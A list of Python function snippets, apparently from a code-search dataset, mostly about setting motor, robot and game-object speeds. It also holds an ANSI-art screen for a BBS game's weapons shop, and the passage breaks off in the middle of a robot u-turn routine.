[ "def speed(self, s=0):", "def speed(self, speed: int, time: int = 0, /) -> None:", "def walk(self):\n self.speed = self.speed + (0.2 * self.legs)", "def set_speed():\n pass", "def set_speed(self,speed):\n self.speed = speed", "def set_speed(speed):\n if speed >255:\n speed =255\n elif speed <0:\n speed =0\n set_left_speed(speed)\n #time.sleep(.1)\n set_right_speed(speed)", "def set_speed(self, speed: str) -> None:\n self.wink.set_state(True, speed)", "def send_speed(self, linear_speed, angular_speed):\n ### Makes a new Twist message\n msg_cmd_vel = Twist()\n \t# Linear velocity\n \tmsg_cmd_vel.linear.x = linear_speed\n \tmsg_cmd_vel.linear.y = 0.0\n \tmsg_cmd_vel.linear.z = 0.0\n \t# Angular velocity\n \tmsg_cmd_vel.angular.x = 0.0\n \tmsg_cmd_vel.angular.y = 0.0\n \tmsg_cmd_vel.angular.z = angular_speed\n ### Publishes the message\n self.cmd_vel.publish(msg_cmd_vel)", "def run(self):\n global moving_line\n global change_requested\n global thick_1_a, thick_1_b, thick_1_c, thick_2_a, thick_2_b, thick_2_c\n global lap_to_go\n global lights\n line = moving_line\n if line == 1:\n thick_1_a = 1\n lights[2].write(1)\n thick_1_b = -1\n lights[1].write(0)\n time.sleep(self.interval)\n thick_1_b = 1\n lights[1].write(1)\n thick_1_c = -1\n lights[0].write(0)\n thick_2_a = -1\n lights[5].write(0)\n thick_2_b = 1\n lights[4].write(1)\n thick_2_c = 1\n lights[3].write(1)\n line = 2\n else:\n thick_2_a = 1\n lights[5].write(1)\n thick_2_b = -1\n lights[4].write(0)\n time.sleep(self.interval)\n thick_2_b = 1\n lights[4].write(1)\n thick_2_c = -1\n lights[3].write(0)\n thick_1_a = -1\n lights[2].write(0)\n thick_1_b = 1\n lights[1].write(1)\n thick_1_c = 1\n lights[0].write(1)\n line = 1\n\n moving_line = line\n change_requested = 0\n lap_to_go = lap_period_sec", "def set_speed(self,speed):\n self.speed_p = speed", "def increase_speed(self, character):\n character.speed = min(character.max_steps/4, character.speed * 1.25)", "def strut(self):\n self.fwd(left=50, right=50)\n for x in range(2):\n self.servo(1000)\n time.sleep(.1) \n self.servo(1500) # Look Straight\n time.sleep(1)\n self.servo(2000)\n time.sleep(.1)\n self.servo(1500)", "def set_speed(self, speed):\n self.speed = speed", "def move_turtle(self):\n self.forward(self.move_speed)", "def setSpeedEngine1(speed: int):\n pass", "def set_speed(self, speed):\n self._set_sub_text('speed', text=str(speed))\n return self", "def increase_speed(self):\n self.state['speed_boost'] = True\n self.speed = self.maze.block_size / 8", "def setSpeedEngine2(speed: int):\n pass", "def move(self, linear_speed, angular_speed):\n twist = Twist()\n twist.linear.x = linear_speed\n twist.angular.z = angular_speed\n self.pub.publish(twist)", "def change_speed(self, action):\r\n if action == \"faster\":\r\n self.speed += 1\r\n else:\r\n if self.speed > 1:\r\n self.speed -= 1", "def speed(self) -> int:", "def speed(self) -> int:", "def set_speed(self, speed):\r\n speed = float(speed)\r\n speed = int(round(speed * 27.7778))\r\n return self.send_command('speed %s' % speed)", "def set_speed(self, new_speed):\n self.__x_speed, self.__y_speed = new_speed", "def setSpeedEngine3(speed: int):\n pass", "def increase_aliens_speed(self):\r\n self.alien_speed_factor += 0.01\r\n self.alien_bullet_speed_factor += 0.02", "def set_speed(self, speed, motor = 'both'):\n #easily handle setting both or a single motor\n motors = ['speed'] if motor == 'both' else [motor]\n outputs = []\n for motor in motors:\n output = self._send_command(\"%s %s\" % (motor, speed))\n outputs.append(output.strip())\n\n return \", \".join(outputs)", "def move_set_speed(self, speed):\n # self.motor_set_speed(MOTOR_LEFT, speed)\n # self.motor_set_speed(MOTOR_RIGHT, speed)\n self.move_speed = speed\n print(\"move_speed is now:\", self.move_speed)", "def setSpeedEngine4(speed: int):\n pass", "def set_speed(self, speed):\n return self.bot_client.send_command(_Command.SetSpeed, speed)", "def set_speed(self, speed):\n # create the MAV_CMD_DO_CHANGE_SPEED command\n msg = self.message_factory.command_long_encode(0, 0,mavutil.mavlink.MAV_CMD_DO_CHANGE_SPEED,0,0,speed,0, 0, 0, 0, 0)\n\n # send command to vehicle\n self.send_mavlink(msg)\n self.flush()", "def increment_speed(self):\n self.speed += 0.0004", "def increase_speed(self):\n self.target_speed *= self.speedup_scale\n self.bullet_speed_factor *= self.speedup_scale", "def set_speeds(self, speed_1, speed_2):\n pass", "def set_cmd_velocity(self, speed):\n self.gripper_io.set_signal_value(\"speed_mps\", speed)", "def setSpeed(self, v):\n\t\tconverted = self.convertSpeed(v)\n\t\tprint(converted)\n\t\t# set both stage speeds\n\t\tself.zaberSend(self.translation[\"hor\"], self.cmd[\"setTargetSpeed\"], data = converted)\n\t\tself.zaberSend(self.translation[\"ver\"], self.cmd[\"setTargetSpeed\"], data = converted)", "def set_speed(self, speed=0):\n speed = clamp(speed)\n self._state.speed = speed\n self.send_command(Command.SET_SPEED, [int(speed)])", "def speed(self, speed):\n self._speed = speed\n self._rotspeed = speed", "def motorSpeed(self, speedRPM_l, speedRPM_r):\n\n self.motors__Direction(speedRPM_l, speedRPM_r)\n\n speedRPM_l = abs(speedRPM_l)\n speedRPM_r = abs(speedRPM_r)\n\n speedRPM_l = self.constrainSpeed(speedRPM_l)\n speedRPM_r = self.constrainSpeed(speedRPM_r)\n\n# Left motor\n pwmDuration = 4095.0 * speedRPM_l / self.motorMaxRPM\n# print(\"MuleBot.motorSpeed Duration left float: \", pwmDuration)\n pwmDuration = int( pwmDuration )\n# print(\"MuleBot.motorSpeed Duration left int: \", pwmDuration)\n startOfPulse = 0\n self.pwm.setPWM(self.dcMotorLeftMotor, startOfPulse, pwmDuration)\n MuleBot.dcMotorPWMDurationLeft = pwmDuration\n\n# Right motor\n #Adjust for right motor being faster\n pwmDuration = 4095.0 * speedRPM_r / self.motorMaxRPM\n pwmDuration = pwmDuration * 9727 / 10000 # 98.519113 percent\n pwmDuration = int( pwmDuration )\n# print(\"MuleBot.motorSpeed Duration right int: \", pwmDuration)\n startOfPulse = 0\n self.pwm.setPWM(self.dcMotorRightMotor, startOfPulse, pwmDuration)\n MuleBot.dcMotorPWMDurationRight = pwmDuration", "def increase_car_speed(self):\r\n self.car_speed += 5", "def speed(self, value: int, /) -> None:", "def move(self, frames_per_second):\n # tuple_add in one line\n position_delta = tuple(map(lambda x: x/frames_per_second, self.velocity))\n velocity_delta = tuple(map(lambda x: x/frames_per_second, (0, GRAVITY)))\n self.position = tuple(sum(x) for x in zip(self.position, position_delta))\n # apply the pull of GRAVITY\n self.velocity = tuple(sum(x) for x in zip(self.velocity, velocity_delta))\n #print('shell.move:postion:{}'.format(self.position))", "def movespeed(self, speed):\n self._speed = speed", "def set_left_speed(speed):\n if speed >255:\n speed =255\n elif speed <0:\n speed =0\n return write_i2c_block(ADDRESS,set_left_speed_cmd+[speed,0,0])", "def set_left_speed(speed):\n if speed >255:\n speed =255\n elif speed <0:\n speed =0\n return write_i2c_block(ADDRESS,set_left_speed_cmd+[speed,0,0])", "def set_speed(self, level):\n speed = self.SPEED + (self.SPEED_INCREMENT * level)\n\n if self.lane % 2:\n # Move to the right\n self.velocity = (speed, 0)\n else:\n # Move to the left\n self.velocity = (-speed, 0)", "def set_speed(self, v):\n self.v = v", "def speed(self):\n self.convert_window(\"Speed\", \"meters/second\", [\"Mach number\", \"Nm/24hr\", \"centimeters/minute\", \"centimeters/second\", \"feet/hour\", \"feet/minute\", \"feet/second\", \"inches/minute\", \"inches/second\", \"kilometers/hour\", \"kilometers/second\", \"knots\", \"meters/hour\", \"meters/minute\", \"meters/second\", \"miles/hour\", \"miles/minute\", \"miles/second\", \"nautical miles/hour\", \"speed of light\", \"speed of sound\", \"yards/hour\", \"yards/minute\", \"yards/second\"])", "def set_speed(mode, spd = 0, side = \"both\"):\n global speeds, man_speeds\n \n temp = {}\n if mode:\n temp = speeds\n else:\n temp = man_speeds\n\n # Make sure that spd is between 0-255\n spd = int(spd)\n if spd > 255:\n spd = 255\n elif spd < 0:\n spd = 0\n\n # Send command to the steering module\n if side == \"both\":\n if mode and spd == speeds[LEFT] and spd == speeds[LEFT]:\n return\n temp[RIGHT] = spd\n temp[LEFT] = spd\n steering_port.write(\"s\".encode())\n \n elif side == \"left\":\n if mode and spd == speeds[LEFT]:\n return\n temp[LEFT] = spd\n steering_port.write(\"v\".encode())\n \n elif side == \"right\":\n if mode and spd == speeds[RIGHT]:\n return\n temp[RIGHT] = spd\n steering_port.write(\"h\".encode())\n \n elif side == \"tower\":\n temp[TOWER] = spd\n steering_port.write(\"t\".encode())\n\n steering_port.write(chr(spd))", "def estimate_speed(word_lists, frame_numbers, min_speed = 0.05, max_speed = 0.6, height = None, **kwargs):\n \n #Estimate movement speed of ticker, by looking at position of the same\n #word in consecutive images.\n estimate_sum = 0\n estimate_count = 0\n \n \"\"\"\n #Find a word\n height = - 1\n for word_list in word_lists:\n for word in word_list:\n if len(word['text']) >= 3:\n height = word['bottom'] - word['top'] + 1\n break\n if height != - 1:\n break\n else:\n raise ValueError(\"Cannot estimate speed if there are no words in word_lists!\")\n \"\"\"\n \n #Iterate over every pair of neighbouring frames.\n for i in range(len(frame_numbers) - 1):\n word_list1 = word_lists[i]\n word_list2 = word_lists[i + 1]\n \n frame_diff = frame_numbers[i + 1] - frame_numbers[i]\n \n #Min and max allowable movement of word.\n min_diff = min_speed * height * frame_diff\n max_diff = max_speed * height * frame_diff\n \n #Iterate over all words in neighbouring frames.\n for word1 in word_list1:\n for word2 in word_list2:\n left_diff = word1['left'] - word2['left']\n right_diff = word1['right'] - word2['right']\n \n #Check that is same word.\n if not word1['text'] == word2['text']:\n continue\n #Check that text has moved a reasonable amount.\n if not inrange(left_diff, min_diff, max_diff):\n continue\n if not inrange(right_diff, min_diff, max_diff):\n continue\n #Check that word is long enough to probably not be coincidence.\n if not len(word1['text']) >= 3:\n continue\n \n #Calculate a speed estimate from word pair\n pixel_diff = word1['left'] - word2['left']\n estimate = pixel_diff / frame_diff\n estimate_sum+= estimate\n estimate_count+= 1\n \n return estimate_sum / estimate_count", "def arthur(self):\n\t\tthismsg = \"\\r\\n\"+self.ESC+\"34m\"+self.A220+self.ESC+\"1;44m\"+self.A176+self.ESC+\"0;34m\"+self.A220+self.A223+self.A176+self.ESC+\"C\"+self.A178+self.A176+self.A254+self.ESC+\"2C\"+self.A220+self.A254+self.ESC+\"6C\"+self.A220+self.A178+self.ESC+\"C\"+self.A220+self.A178+self.ESC+\"C\"+self.ESC+\"1;44m\"+self.A177+self.ESC+\"40m\"+self.A223+self.ESC+\"0;34m\"+self.A223+self.ESC+\"1m\"+self.A223+self.A223+self.ESC+\"0;34m\"+self.A223+self.ESC+\"1m\"+self.A223+self.ESC+\"0;34m\"+self.A223+self.A223+self.A223+self.A223+self.ESC+\"1m\"+self.A223+self.ESC+\"0;34m\"+self.A223+self.A223+self.A223+self.A223+self.A223+self.A223+self.A223+self.A223+self.A223+self.A223+self.A223+self.A223+self.A223+self.A223+self.A223+self.A223+self.A223+self.A223+self.A223+self.A223+self.A223+self.A223+self.A223+self.A223+self.A223+self.A223+self.A223+self.A223+self.A223+self.A223+self.A223+self.A223+self.A223+self.A223+self.A223+self.A223+self.A223+self.A223+self.A223+self.ESC+\"C\"+self.A223+\"\\r\\n\"\n\t\tthismsg += self.ESC+\"C\"+self.A223+self.ESC+\"2C\"+self.A176+self.A223+self.A223+self.ESC+\"1;37m\"+self.A220+self.A220+self.A220+self.A220+self.ESC+\"0m\"+self.A220+self.ESC+\"1m\"+self.A223+self.A223+self.ESC+\"0m\"+self.A223+self.ESC+\"1m\"+self.A223+self.A223+self.ESC+\"0m\"+self.A223+self.ESC+\"1m\"+self.A223+self.A220+self.ESC+\"0m\"+self.A220+self.A220+self.A220+self.A220+self.ESC+\"C\"+self.ESC+\"34m\"+self.A223+self.ESC+\"3C\"+self.ESC+\"1;37mSaga\"+self.ESC+\"Cof\"+self.ESC+\"Cthe\"+self.ESC+\"CRed\"+self.ESC+\"CDragon\"+self.ESC+\"C-\"+self.ESC+\"C\"+self.ESC+\"34mKing\"+self.ESC+\"CArthurs\"+self.ESC+\"CWeapons \"+self.ESC+\"C\"+self.ESC+\"0;34m\"+self.A219+\"\\r\\n\"\n\t\tthismsg += self.A223+self.ESC+\"1;37m\"+self.A220+self.A223+self.A223+self.A223+self.A223+self.A223+self.ESC+\"C\"+self.ESC+\"0m\"+self.A220+self.A220+self.A220+self.A220+self.A220+self.A219+self.A219+self.A219+self.ESC+\"30;47m\"+self.A223+self.ESC+\"37;40m\"+self.A219+self.A220+self.A220+self.A220+self.A220+self.A220+self.ESC+\"C\"+self.A223+self.ESC+\"1;30m\"+self.A223+self.ESC+\"0m\"+self.A223+self.ESC+\"1;30m\"+self.A223+self.A223+self.A220+self.ESC+\"4C\"+self.ESC+\"0;34m\"+self.A220+self.A220+self.A220+self.A220+self.ESC+\"C\"+self.A220+self.A220+self.A220+self.A220+self.A220+self.A220+self.A220+self.A220+self.A220+self.A220+self.A220+self.ESC+\"C\"+self.A220+self.A220+self.A220+self.A220+self.A220+self.A220+self.A220+self.A220+self.A220+self.A220+self.A220+self.A220+self.A220+self.A220+self.A220+self.A220+self.A220+self.A220+self.A220+self.A220+self.A178+self.A220+self.A220+self.A220+self.A220+self.ESC+\"C\"+self.A220+self.A220+\"\\r\\n\"\n\t\tthismsg += self.ESC+\"A\"+self.ESC+\"79C\"+self.ESC+\"37m \"+self.ESC+\"1m\"+self.A219+self.ESC+\"C\"+self.A220+self.ESC+\"47m\"+self.A219+self.A219+self.A223+self.A178+self.A177+self.A176+self.ESC+\"0m\"+self.A219+self.A223+self.ESC+\"1m\"+self.A220+self.ESC+\"0m\"+self.A223+self.A219+self.A219+self.ESC+\"30;47m\"+self.A223+self.A176+self.ESC+\"37;40m\"+self.A219+self.A219+self.A223+self.A220+self.A223+self.A219+self.A219+self.A219+self.A219+self.A219+self.A219+self.A220+self.ESC+\"C\"+self.ESC+\"1;30;47m\"+self.A178+self.ESC+\"C\"+self.ESC+\"0;34m\"+self.A176+self.ESC+\"3C\"+self.A178+self.ESC+\"20C\"+self.A223+self.ESC+\"17C\"+self.ESC+\"1m\"+self.A220+self.A220+self.A220+self.A220+\"\\r\\n\"\n\t\tthismsg += self.ESC+\"A\"+self.ESC+\"79C\"+self.ESC+\"0m \"+self.ESC+\"1m\"+self.A219+self.ESC+\"C\"+self.ESC+\"47m\"+self.A219+self.A219+self.A178+self.ESC+\"0m\"+self.A219+self.ESC+\"30;47m\"+self.A176+self.ESC+\"37;40m\"+self.A219+self.A219+self.A219+self.ESC+\"C\"+self.ESC+\"1m\"+self.A219+self.ESC+\"47m\"+self.A178+self.ESC+\"40m\"+self.A220+self.ESC+\"0m\"+self.A223+self.A219+self.A219+self.A223+self.A220+self.ESC+\"1;47m\"+self.A176+self.ESC+\"0m\"+self.A219+self.ESC+\"C\"+self.A219+self.A219+self.ESC+\"1;47m\"+self.A176+self.A176+self.A176+self.A176+self.ESC+\"30m\"+self.A176+self.ESC+\"C\"+self.ESC+\"40m\"+self.A219+self.ESC+\"3C\"+self.ESC+\"0;34mYou\"+self.ESC+\"Cwalk\"+self.ESC+\"Cinto\"+self.ESC+\"Cthe\"+self.ESC+\"Cwell\"+self.ESC+\"Cknown\"+self.ESC+\"Cweapons\"+self.ESC+\"6C\"+self.ESC+\"1m\"+self.A219+self.ESC+\"44m\"+self.A178+self.ESC+\"0;34m\"+self.A219+\"\\r\\n\"\n\t\tthismsg += self.ESC+\"A\"+self.ESC+\"79C\"+self.ESC+\"37m \"+self.ESC+\"1m\"+self.A219+self.ESC+\"C\"+self.ESC+\"47m\"+self.A178+self.A178+self.A178+\" \"+self.ESC+\"0;30;47m\"+self.A223+self.A177+self.ESC+\"37;40m\"+self.A219+self.A219+self.A219+self.ESC+\"C\"+self.ESC+\"1m\"+self.A219+self.ESC+\"C\"+self.ESC+\"47m\"+self.A178+self.ESC+\"40m\"+self.A220+self.ESC+\"C\"+self.ESC+\"47m\"+self.A177+self.A176+\" \"+self.ESC+\"C\"+self.ESC+\"0m\"+self.A219+self.ESC+\"1;47m\"+self.A176+self.A176+self.A177+self.A177+self.A177+self.A176+self.ESC+\"30m\"+self.A176+self.ESC+\"C\"+self.ESC+\"40m\"+self.A219+self.ESC+\"3C\"+self.ESC+\"0;34mshop,\"+self.ESC+\"Cyou\"+self.ESC+\"Cpause\"+self.ESC+\"Cto\"+self.ESC+\"Clook\"+self.ESC+\"Caround\"+self.ESC+\"Cat\"+self.ESC+\"Call\"+self.ESC+\"Cof\"+self.ESC+\"2C\"+self.A222+self.ESC+\"1;44m\"+self.A177+self.ESC+\"0;34m\"+self.A219+\"\\r\\n\"\n\t\tthismsg += self.ESC+\"A\"+self.ESC+\"79C\"+self.ESC+\"37m \"+self.ESC+\"1m\"+self.A219+self.ESC+\"C\"+self.A223+self.ESC+\"47m\"+self.A178+self.A177+self.ESC+\"0m\"+self.A219+self.A219+self.A219+self.A219+self.A219+self.A219+self.A219+self.ESC+\"C\"+self.ESC+\"1m\"+self.A219+self.ESC+\"C\"+self.ESC+\"47m\"+self.A178+self.A177+self.ESC+\"0m\"+self.A220+self.A223+self.A220+self.ESC+\"1;47m\"+self.A176+self.A176+self.A177+self.A177+self.A176+self.A176+self.A176+self.ESC+\"30m\"+self.A176+self.ESC+\"0m\"+self.A223+self.ESC+\"C\"+self.ESC+\"1;30m\"+self.A219+self.ESC+\"3C\"+self.ESC+\"0;34mthe\"+self.ESC+\"Cmany\"+self.ESC+\"Cimplements\"+self.ESC+\"Cof\"+self.ESC+\"Cdestruction.\"+self.ESC+\"2CA\"+self.ESC+\"37m \"+self.ESC+\"4C\"+self.ESC+\"1;34;44m\"+self.A176+self.ESC+\"0;34m\"+self.A219+\"\\r\\n\"\n\t\tthismsg += self.ESC+\"A\"+self.ESC+\"79C\"+self.ESC+\"37m \"+self.ESC+\"C \"+self.ESC+\"1m\"+self.A219+self.ESC+\"C\"+self.ESC+\"47m\"+self.A177+self.A176+self.ESC+\"0m\"+self.A219+self.A219+self.A219+self.A219+self.A219+self.A219+self.A223+self.ESC+\"1m\"+self.A220+self.ESC+\"C\"+self.ESC+\"47m\"+self.A178+self.ESC+\"40m\"+self.A220+self.A223+self.ESC+\"47m\"+self.A177+self.A176+self.ESC+\"0m\"+self.A220+self.A223+self.ESC+\"1;47m\"+self.A177+self.A176+self.A176+self.ESC+\"0m\"+self.A219+self.ESC+\"30;47m\"+self.A220+self.A176+self.ESC+\"1m\"+self.A177+self.ESC+\"C\"+self.ESC+\"40m\"+self.A178+self.ESC+\"4C\"+self.ESC+\"0;34mfat\"+self.ESC+\"Cman\"+self.ESC+\"Cwoddles\"+self.ESC+\"Cinto\"+self.ESC+\"Cthe\"+self.ESC+\"Croom,\"+self.ESC+\"Cand\"+self.ESC+\"2C \"+self.ESC+\"37m \"+self.ESC+\"2C\"+self.ESC+\"1;34;44m\"+self.A176+self.ESC+\"0;30;44m\"+self.A176+self.ESC+\"40m\\r\\n\"\n\t\tthismsg += self.ESC+\"A\"+self.ESC+\"79C\"+self.ESC+\"37m \"+self.ESC+\"C \"+self.ESC+\"1m\"+self.A219+self.ESC+\"C\"+self.ESC+\"47m\"+self.A176+\" \"+self.ESC+\"0m\"+self.A219+self.A219+self.A223+self.ESC+\"33m\"+self.A220+self.ESC+\"37m\"+self.A223+self.ESC+\"1m\"+self.A220+self.ESC+\"47m\"+self.A178+self.A178+self.A177+self.ESC+\"0m\"+self.A220+self.ESC+\"1m\"+self.A223+self.ESC+\"47m\"+self.A177+self.A176+self.ESC+\"0;30;47m\"+self.A176+self.A223+self.ESC+\"1m\"+self.A176+self.ESC+\"0m\"+self.A220+self.A223+self.ESC+\"33m\"+self.A220+self.ESC+\"37m\"+self.A223+self.A219+self.A219+self.ESC+\"1;30;47m\"+self.A178+self.ESC+\"C\"+self.ESC+\"40m\"+self.A178+self.ESC+\"4C\"+self.ESC+\"0;34masks\"+self.ESC+\"C\\\"\"+self.ESC+\"1mWadaya\"+self.ESC+\"Cwant\"+self.ESC+\"Ckid?\"+self.ESC+\"0;34m\\\"\"+self.ESC+\"17C\"+self.ESC+\"37m \"+self.ESC+\"2C\"+self.ESC+\"1;34;44m\"+self.A176+self.ESC+\"0;30;44m\"+self.A176+self.ESC+\"40m\\r\\n\"\n\t\tthismsg += self.ESC+\"A\"+self.ESC+\"79C\"+self.ESC+\"37m \"+self.ESC+\"C \"+self.ESC+\"1m\"+self.A219+self.ESC+\"C\"+self.ESC+\"47m\"+self.A176+self.ESC+\"0m\"+self.A219+self.ESC+\"30;47m\"+self.A254+self.A176+self.ESC+\"37;40m\"+self.A223+self.ESC+\"1;33m\"+self.A220+self.ESC+\"43m\"+self.A177+self.ESC+\"0;33m\"+self.A220+self.ESC+\"1;37m\"+self.A223+self.ESC+\"47m\"+self.A177+self.A176+self.ESC+\"0m\"+self.A223+self.A220+self.A220+self.A223+self.A223+self.ESC+\"1;47m \"+self.ESC+\"0m\"+self.A223+self.ESC+\"33m\"+self.A220+self.ESC+\"1;43m\"+self.A177+self.ESC+\"C\"+self.ESC+\"0m\"+self.A219+self.A219+self.ESC+\"1;30m\"+self.A219+self.A223+self.ESC+\"C\"+self.A178+self.ESC+\"47C\"+self.ESC+\"0;34m\"+self.A219+self.ESC+\"30;44m\"+self.A177+self.ESC+\"40m\\r\\n\"\n\t\tthismsg += self.ESC+\"A\"+self.ESC+\"79C\"+self.ESC+\"37m \"+self.ESC+\"34m\"+self.A176+self.ESC+\"C \"+self.ESC+\"1;37;47m\"+self.A178+self.ESC+\"C\"+self.A176+self.ESC+\"0m\"+self.A223+self.ESC+\"1;33m\"+self.A220+self.ESC+\"43m\"+self.A178+self.ESC+\"40m\"+self.A223+self.ESC+\"C\"+self.ESC+\"43m\"+self.A176+self.ESC+\"0;33m\"+self.A223+self.A220+self.ESC+\"C\"+self.ESC+\"1;37;47m\"+self.A177+self.A177+self.A176+self.ESC+\"0m\"+self.A219+self.A223+self.ESC+\"1;33m\"+self.A220+self.ESC+\"43m\"+self.A178+self.ESC+\"C\"+self.ESC+\"0;33m\"+self.A223+self.ESC+\"1;43m\"+self.A176+self.ESC+\"0;33m\"+self.A220+self.ESC+\"37m\"+self.A223+self.ESC+\"1;30m\"+self.A219+self.ESC+\"C\"+self.A178+self.ESC+\"6C\"+self.ESC+\"0;34m[\"+self.ESC+\"1mB\"+self.ESC+\"0;34m]\"+self.ESC+\"1muy\"+self.ESC+\"CWeapon\"+self.ESC+\"30C\"+self.ESC+\"0;34m\"+self.A219+self.ESC+\"30;44m\"+self.A177+self.ESC+\"40m\\r\\n\"\n\t\tthismsg += self.ESC+\"A\"+self.ESC+\"79C\"+self.ESC+\"37m \"+self.ESC+\"34m\"+self.A178+self.ESC+\"C \"+self.ESC+\"1;37;47m\"+self.A177+self.ESC+\"2C\"+self.ESC+\"40m\"+self.A223+self.ESC+\"33m\"+self.A219+self.A220+self.ESC+\"0;33m\"+self.A178+self.A223+self.ESC+\"37m\"+self.A220+self.A219+self.A220+self.ESC+\"1;47m\"+self.A177+self.A176+self.A176+self.ESC+\"0m\"+self.A219+self.A220+self.ESC+\"1m\"+self.A223+self.ESC+\"0m\"+self.A220+self.A220+self.ESC+\"1;33m\"+self.A223+self.A220+self.A220+self.ESC+\"43m\"+self.A177+self.ESC+\"0;33m\"+self.A223+self.ESC+\"2C\"+self.ESC+\"1;30m\"+self.A219+self.ESC+\"6C\"+self.ESC+\"0;34m[\"+self.ESC+\"1mS\"+self.ESC+\"0;34m]\"+self.ESC+\"1mell\"+self.ESC+\"CWeapon\"+self.ESC+\"29C\"+self.ESC+\"0;34m\"+self.A219+self.ESC+\"30;44m\"+self.A177+self.ESC+\"40m\\r\\n\"\n\t\tthismsg += self.ESC+\"A\"+self.ESC+\"79C\"+self.ESC+\"37m \"+self.ESC+\"34m\"+self.A176+self.A176+self.ESC+\"C \"+self.ESC+\"1;37;47m\"+self.A176+self.ESC+\"C\"+self.ESC+\"0m\"+self.A223+self.A220+self.A220+self.A220+self.A219+self.ESC+\"1;47m\"+self.A176+self.A176+self.A176+self.A176+self.ESC+\"0;30;47m\"+self.A176+self.ESC+\"37;40m\"+self.A219+self.A219+self.A219+self.A219+self.ESC+\"1;30;47m\"+self.A176+self.ESC+\"0m\"+self.A219+self.A219+self.A220+self.A220+self.ESC+\"1;30m\"+self.A220+self.A223+self.ESC+\"C\"+self.A219+self.ESC+\"7C\"+self.ESC+\"0;34m[\"+self.ESC+\"1mY\"+self.ESC+\"0;34m]\"+self.ESC+\"1mour\"+self.ESC+\"CStats\"+self.ESC+\"30C\"+self.ESC+\"0;34m\"+self.A219+self.ESC+\"30;44m\"+self.A178+self.ESC+\"40m\\r\\n\"\n\t\tthismsg += self.ESC+\"A\"+self.ESC+\"79C\"+self.ESC+\"37m \"+self.ESC+\"C\"+self.ESC+\"34m\"+self.A176+self.ESC+\"C \"+self.ESC+\"37m\"+self.A223+self.A220+self.ESC+\"C\"+self.A223+self.A223+self.A219+self.A219+self.A219+self.A219+self.A219+self.ESC+\"30;47m\"+self.A220+self.A177+self.ESC+\"37;40m\"+self.A219+self.A219+self.A219+self.ESC+\"1;30;47m\"+self.A220+self.A220+self.A178+self.ESC+\"40m\"+self.A223+self.A223+self.ESC+\"C\"+self.A220+self.A223+self.ESC+\"0;34m\"+self.A176+self.ESC+\"7C[\"+self.ESC+\"1mR\"+self.ESC+\"0;34m]\"+self.ESC+\"1meturn\"+self.ESC+\"Cto\"+self.ESC+\"CTown\"+self.ESC+\"25C\"+self.ESC+\"0;34m\"+self.A222+self.ESC+\"1;44m\"+self.A177+self.ESC+\"0;30;44m\"+self.A178+self.ESC+\"40m\\r\\n\"\n\t\tthismsg += self.ESC+\"A\"+self.ESC+\"79C\"+self.ESC+\"37m \"+self.ESC+\"34m\"+self.A220+self.ESC+\"1;44m\"+self.A176+self.ESC+\"0;34m\"+self.A220+self.ESC+\"C\"+self.A178+self.A220+self.ESC+\"37m\"+self.A223+self.A223+self.A220+self.A220+self.ESC+\"C\"+self.A223+self.A223+self.A223+self.ESC+\"1;30;47m\"+self.A176+self.A177+self.A219+self.ESC+\"40m\"+self.A223+self.A223+self.A223+self.ESC+\"C\"+self.A220+self.A220+self.A223+self.A223+self.ESC+\"C\"+self.ESC+\"0;34m\"+self.A220+self.A219+self.A176+self.ESC+\"47C\"+self.A219+self.ESC+\"1;44m\"+self.A176+self.ESC+\"0;30;44m\"+self.A178+self.ESC+\"40m\\r\\n\"\n\t\tthismsg += self.ESC+\"A\"+self.ESC+\"79C\"+self.ESC+\"37m \"+self.ESC+\"C\"+self.ESC+\"34m\"+self.A223+self.ESC+\"C\"+self.A220+self.A254+self.A178+self.A219+self.A219+self.A220+self.A220+self.ESC+\"37m\"+self.A223+self.A223+self.A223+self.A220+self.ESC+\"C\"+self.ESC+\"1;30m\"+self.A223+self.ESC+\"C\"+self.A220+self.A223+self.A223+self.A223+self.ESC+\"C\"+self.ESC+\"0;34m\"+self.A176+self.A176+self.A223+self.A178+self.A178+self.A176+self.ESC+\"2C\"+self.ESC+\"1;44m\"+self.A176+self.ESC+\"0;34m\"+self.A223+self.A223+self.A223+self.A178+self.A223+self.A223+self.ESC+\"C\"+self.A223+self.A178+self.A223+self.ESC+\"C\"+self.A223+self.A223+self.ESC+\"C\"+self.A223+self.A176+self.ESC+\"C\"+self.A223+self.ESC+\"C\"+self.A223+self.A223+self.ESC+\"C\"+self.A223+self.A223+self.ESC+\"30;44m\"+self.A177+self.ESC+\"19C\"+self.ESC+\"34;40m\"+self.A223+self.A223+self.A223+self.A223+\"\\r\\n\"\n\t\tthismsg += self.ESC+\"A\"+self.ESC+\"79C\"+self.ESC+\"37m \"+self.ESC+\"34m\"+self.A177+self.A178+self.A219+self.A220+self.ESC+\"C\"+self.A176+self.A223+self.A178+self.A178+self.A178+self.A178+self.A223+self.A176+self.ESC+\"C\"+self.ESC+\"37m\"+self.A223+self.ESC+\"1;30m\"+self.A220+self.A223+self.ESC+\"C\"+self.ESC+\"0;34m\"+self.A223+self.A178+self.A176+self.ESC+\"4C\"+self.A176+self.ESC+\"C\"+self.A220+self.A219+self.ESC+\"30;44m\"+self.A176+\" \"+self.ESC+\"34;40m\"+self.A254+self.ESC+\"37m \"+self.ESC+\"34m\"+self.A220+self.ESC+\"30;44m\"+self.A176+self.A178+self.ESC+\"34;40m\"+self.A219+self.A219+self.A219+self.ESC+\"30;44m\"+self.A176+self.ESC+\"34;40m\"+self.A219+self.A220+self.A219+self.A219+self.A219+self.A219+self.A219+self.A222+self.A219+self.A219+\"\\r\\n\"\n\t\treturn thismsg", "def do_light(self,count):\n if (count == ''):\n count=\"1\"\n for i in range(0,int(count)):\n light=RCtime(12)\n print \"*\"*(light/4000)+\": %d\" % light", "def ChangeWindSpeed(self,speed):\n self.problem.ChangeWindSpeed(speed)", "def u_turn(self, direction, diameter_in):\n \n# pdb.set_trace()\n # Calculate radius of turn for the inside wheel.\n r_in = diameter_in / 2\n\n # Outside radius is 20 inches from inside radius.\n r_out = r_in + MuleBot.WHEEL_BASE_LENGTH\n \n # Outside travel distance\n travel = r_out * 3.14159\n travel_revolutions = travel / MuleBot.CIRCUM_IN\n \n r_ratio = r_out / r_in\n #r_ratio_half = r_ratio / 2\n\n speed_multiplier = MuleBot.MAX_RPM / r_ratio\n\n outside_rpm = r_ratio * speed_multiplier\n inside_rpm = speed_multiplier\n \n \n # \n # minutes at outside_rpm\n minutes = travel_revolutions / outside_rpm\n seconds = minutes * MuleBot.SECONDS_PER_MINUTE\n \n # Something isn't quite perfect.\n if direction == 'left':\n if diameter_in < 25:\n seconds -= 1\n else:\n seconds -= 2\n else:\n if diameter_in < 25:\n seconds += 